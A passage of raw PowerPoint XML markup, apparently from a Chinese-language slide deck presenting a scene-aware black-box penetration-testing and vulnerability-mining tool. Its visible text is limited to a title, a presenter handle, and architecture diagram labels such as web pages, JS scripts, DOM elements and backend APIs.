              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>我将详细介绍我们的工具架构</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微信图片_20251114201015_1821_193"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2052955" y="-1270"/>
            <a:ext cx="10139045" cy="6859270"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11" descr="3222e0d85fd6763e6a320ddab3476966"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="464820" y="469265"/>
            <a:ext cx="6316345" cy="272415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16" descr="a0222903334c86597d5446e3cc93092f"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7223760" y="256540"/>
            <a:ext cx="1875155" cy="91884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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11" descr="3222e0d85fd6763e6a320ddab3476966"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="464820" y="469265"/>
            <a:ext cx="6316345" cy="2724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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="直接连接符 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="216535" y="844550"/>
            <a:ext cx="8294370" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="55000">
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="6000">
                  <a:srgbClr val="050927">
                    <a:lumMod val="96000"/>
                    <a:alpha val="67000"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="8100000" scaled="1"/>
            </a:gradFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:srgbClr val="FFFFFF"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:srgbClr val="FFFFFF"/>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5.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.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1a86874c1cd6849ad1a2b8ac0de8c790"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9" descr="63bb4f474ebf4c56237da0b421bc3bf9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="959485" y="1152525"/>
            <a:ext cx="11232515" cy="5705475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16" descr="a0222903334c86597d5446e3cc93092f"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10053320" y="233680"/>
            <a:ext cx="1875155" cy="9188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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide10.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.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image" Target="../media/image31.png"/><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19.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31.png"/><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tags" Target="../tags/tag20.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7.png"/><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tags" Target="../tags/tag21.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide15.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image" Target="../media/image14.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide12.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.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tags" Target="../tags/tag22.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25.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tags" Target="../tags/tag30.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4.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tags" Target="../tags/tag31.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag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tags" Target="../tags/tag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notesSlide" Target="../notesSlides/notesSlide3.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549275" y="1642110"/>
            <a:ext cx="7111365" cy="1938020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6000" b="1" dirty="0">
                <a:ln w="15875">
                  <a:noFill/>
                </a:ln>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="40000">
                      <a:schemeClr val="accent1">
                        <a:lumMod val="5000"/>
                        <a:lumOff val="95000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="96000">
                      <a:srgbClr val="8460D0">
                        <a:alpha val="74000"/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="67000">
                      <a:schemeClr val="accent1">
                        <a:lumMod val="45000"/>
                        <a:lumOff val="55000"/>
                      </a:schemeClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:latin typeface="腾讯体 W7" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体 W7" panose="020C08030202040F0204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>基于场景感知的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6000" b="1" dirty="0">
              <a:ln w="15875">
                <a:noFill/>
              </a:ln>
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="40000">
                    <a:schemeClr val="accent1">
                      <a:lumMod val="5000"/>
                      <a:lumOff val="95000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="96000">
                    <a:srgbClr val="8460D0">
                      <a:alpha val="74000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="67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ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6000" b="1" dirty="0">
                <a:ln w="15875">
                  <a:noFill/>
                </a:ln>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="40000">
                      <a:schemeClr val="accent1">
                        <a:lumMod val="5000"/>
                        <a:lumOff val="95000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="96000">
                      <a:srgbClr val="8460D0">
                        <a:alpha val="74000"/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="67000">
                      <a:schemeClr val="accent1">
                        <a:lumMod val="45000"/>
                        <a:lumOff val="55000"/>
                      </a:schemeClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:latin typeface="腾讯体 W7" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体 W7" panose="020C08030202040F0204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>下一代黑盒渗透</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6000" b="1" dirty="0">
                <a:ln w="15875">
                  <a:noFill/>
                </a:ln>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="40000">
                      <a:schemeClr val="accent1">
                        <a:lumMod val="5000"/>
                        <a:lumOff val="95000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="96000">
                      <a:srgbClr val="8460D0">
                        <a:alpha val="74000"/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="67000">
                      <a:schemeClr val="accent1">
                        <a:lumMod val="45000"/>
                        <a:lumOff val="55000"/>
                      </a:schemeClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:latin typeface="腾讯体 W7" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体 W7" panose="020C08030202040F0204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>方案</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6000" b="1" dirty="0">
              <a:ln w="15875">
                <a:noFill/>
              </a:ln>
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="40000">
                    <a:schemeClr val="accent1">
                      <a:lumMod val="5000"/>
                      <a:lumOff val="95000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="96000">
                    <a:srgbClr val="8460D0">
                      <a:alpha val="74000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="67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8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2827655" y="3880485"/>
            <a:ext cx="3121025" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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胡宇睿</a:t>
            </a:r>
            <a:r>
              <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xjtuHunter</a:t>
            </a:r>
            <a:endPar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圆角矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889635" y="3208655"/>
            <a:ext cx="2532380" cy="3158490"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5770"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="41285A"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg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圆角矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3603625" y="3519805"/>
            <a:ext cx="6283960" cy="1750695"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5770"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="002060"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg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圆角矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3490595" y="1169670"/>
            <a:ext cx="5296535" cy="1968500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5770"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>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整体架构</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场景感知的黑盒漏洞</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挖掘</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nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="871252" y="1208370"/>
            <a:ext cx="9088618" cy="5159483"/>
            <a:chOff x="1399" y="792"/>
            <a:chExt cx="16393" cy="9633"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2" name="图片 1"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6532" y="2020"/>
              <a:ext cx="1134" cy="1134"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="文本框 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6456" y="3225"/>
              <a:ext cx="1307" cy="458"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>Web</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>页面</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="图片 13"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8430" y="2967"/>
              <a:ext cx="850" cy="850"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="图片 14"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8522" y="1131"/>
              <a:ext cx="850" cy="850"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="文本框 15"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8331" y="2020"/>
              <a:ext cx="1467"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前端页面</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="文本框 16"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8162" y="3817"/>
              <a:ext cx="1467" cy="458"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>JS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>脚本</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sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="左大括号 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7926" y="1499"/>
              <a:ext cx="311" cy="2421"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 62700"/>
                <a:gd name="adj2" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="19050"/>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pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="图片 18"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="9542" y="1272"/>
              <a:ext cx="567" cy="567"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="图片 24"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="12318" y="2070"/>
              <a:ext cx="850" cy="850"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="29" name="图片 28"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="9546" y="3154"/>
              <a:ext cx="567" cy="567"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="36" name="图片 35"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="10479" y="2967"/>
              <a:ext cx="850" cy="850"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="38" name="图片 37"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="10479" y="1095"/>
              <a:ext cx="850" cy="850"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="文本框 38"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10292" y="2027"/>
              <a:ext cx="1467" cy="458"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>Dom</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>元素</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pic>
          <p:nvPicPr>
            <p:cNvPr id="40" name="图片 39"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="14040" y="2147"/>
              <a:ext cx="850" cy="850"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="41" name="图片 40"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="13320" y="2244"/>
              <a:ext cx="567" cy="567"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="文本框 41"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13834" y="3024"/>
              <a:ext cx="1498"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cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>后端</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>API</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p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="左大括号 42"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="11644" y="1351"/>
              <a:ext cx="311" cy="2421"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 62700"/>
                <a:gd name="adj2" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="19050"/>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44" name="圆角矩形 43"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="15936" y="2799"/>
              <a:ext cx="1737" cy="2161"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 7700"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="bg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45" name="圆角矩形 44"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="16110" y="2992"/>
              <a:ext cx="850" cy="455"/>
            </a:xfrm>
            <a:prstGeom prst="round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46" name="文本框 45"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="16110" y="3022"/>
              <a:ext cx="990" cy="429"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
